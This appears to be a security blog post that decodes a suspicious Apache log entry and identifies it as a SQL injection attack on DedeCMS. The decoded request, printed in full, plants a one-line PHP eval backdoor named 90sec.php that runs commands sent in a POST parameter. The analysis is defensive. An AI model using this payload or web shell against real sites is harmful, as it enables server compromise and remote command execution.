We received an interesting submission about a strange looking Apache web server log. While the log does not look malicious, after examining it carefully it certainly looks strange, as you can see below:

10.10.10.10 - - [05/Sep/2013:06:02:49 +0800] "GET /plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109 [snip] HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

The log, as shown below, contains a request to the download.php PHP script with a bunch of parameters that appear to be the same. After decoding %5B and %5D to [ and ], the request becomes a bit more obvious:

/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98

The request above contains repeating arrs1[] parameters – PHP treats these as members of an array so this actually creates an array called arrs1 (and later arrs2 as shown in the original log) which contains various numbers. These numbers (99, 102, 103 …) look like ASCII encodings, so the next step to decode this is to push it through a perl one liner that will work on the original log:

$ perl -pe 's/(&arrs(1|2)%5B%5D=)(\d+)/chr($3)/ge' < original.log

10.10.10.10 - - [05/Sep/2013:06:02:49 +0800] "GET /plus/download.php?open=1cfg_dbprefixmytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'` HTTP/1.1" 302 302 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

And this definitely looks malicious. After a bit of research, it turned out that this is an attack against a known vulnerability in the DedeCMS, a CMS written in PHP that appears to be popular in Asia. This CMS has a pretty nasty SQL injection vulnerability that can be exploited with the request shown above.

The vulnerability exists because the CMS uses the $GLOBALS global variable which is then further propagated to an SQL query. The resulting query, from the decoded attack above, is pretty obvious: the attacker will create a file called 90sec.php which is a very simple backdoor PHP shell that allows the attacker to execute any command with a POST HTTP request that contains the command to be executed in the parameter called guige (highlighted above).

While in this case this was simply a way to transfer an array over a GET request, similar request can also abuse HTTP Parameter Pollution attacks, where a single parameter is added multiple times into GET or POST requests, resulting in potentially unexpected behavior.

Additionally, as you can see in the log at the top, the User Agent string has been set to WinHttp.WinHttpRequest, which indicates that this request was created by a script or an attack tool executed on a Windows machine.

Thanks to our reader for sending the logs, and for being alert about strange looking requests – something everyone should do.

--
@bojanz
Bojan
INFIGO IS